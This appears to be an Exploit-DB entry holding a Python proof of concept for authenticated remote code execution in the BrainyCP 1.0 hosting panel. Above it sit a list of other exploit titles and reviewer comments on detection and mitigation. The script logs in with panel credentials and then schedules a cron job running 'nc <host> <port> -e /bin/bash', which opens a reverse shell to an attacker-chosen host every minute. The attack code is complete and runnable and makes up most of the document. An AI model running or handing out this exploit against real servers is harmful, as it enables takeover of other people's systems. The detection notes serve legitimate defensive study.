
8 changes to exploits/shellcodes/ghdb Roxy Fileman 1.4.5 - Arbitrary File Upload Paradox Security Systems IPR512 - Denial Of Service WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing BrainyCP V1.0 - Remote Code Execution Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) ever gauzy v0.281.9 - JWT weak HMAC secret
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A
#
# Reviewer notes (what this proof of concept shows, read from the code below):
#   * It is an authenticated issue: the script first logs in through
#     /auth.php with a valid panel account, then uses the panel's own
#     "add cron job" AJAX action to schedule a command of its choosing.
#   * Nothing in the script bypasses authentication. The risk is that any
#     account allowed to reach the crontab action can have the host run an
#     arbitrary command line. Which privilege level that command runs with is
#     not shown here; the form only passes the login name as "cron_user".
#   * Detection: look in the panel's web logs for POSTs to
#     index.php?do=crontab&subdo=ajax&subaction=addcron, review per-user
#     crontabs for entries that start a shell bound to a network connection,
#     and alert on unexpected outbound connections from the panel host.
#   * Mitigation (general): restrict who holds panel credentials and who may
#     use the cron feature, and filter egress from the server.
#   * Script caveats: the password is read with input(), so it is echoed on
#     the terminal; the login check is a text heuristic; the reply to the
#     cron request is never inspected, so the final message is not evidence
#     that anything was scheduled.

import requests

# Operator-supplied values. Prompt order and prompt text are unchanged.
base_url = input("URL: ")
panel_user = input("Username: ")
panel_pass = input("Password: ")
callback_host = input("IP: ")
callback_port = input("Port: ")

# One Session so the cookie set by the login request is sent with the
# follow-up request.
http = requests.Session()
auth_reply = http.post(
    f"{base_url}/auth.php",
    data={"login": panel_user, "password": panel_pass, "lan": "/"},
)

# Heuristic: if the returned page still contains the "Sign In" text, the
# login is treated as failed and the script stops.
if "Sign In" in auth_reply.text:
    print("[-] Wrong credentials or may the system patched.")
    exit()

# Command line placed in the cron entry. It is built verbatim from the two
# values typed above.
cron_command = f"nc {callback_host} {callback_port} -e /bin/bash"

# Form fields posted to the crontab "addcron" action. Every schedule field is
# "*", which in cron syntax means the entry fires every minute.
EVERY = "*"
cron_form = {
    "cron_freq_minutes": EVERY,
    "cron_freq_minutes_own": "",
    "cron_freq_hours": EVERY,
    "cron_freq_hours_own": "",
    "cron_freq_days": EVERY,
    "cron_freq_days_own": "",
    "cron_freq_months": EVERY,
    "cron_freq_weekdays": EVERY,
    "cron_command": cron_command,
    "cron_user": panel_user,
}
http.post(
    f"{base_url}/index.php?do=crontab&subdo=ajax&subaction=addcron",
    data=cron_form,
)

# Printed unconditionally; the reply to the request above is not checked.
print("[+] Check your listener!")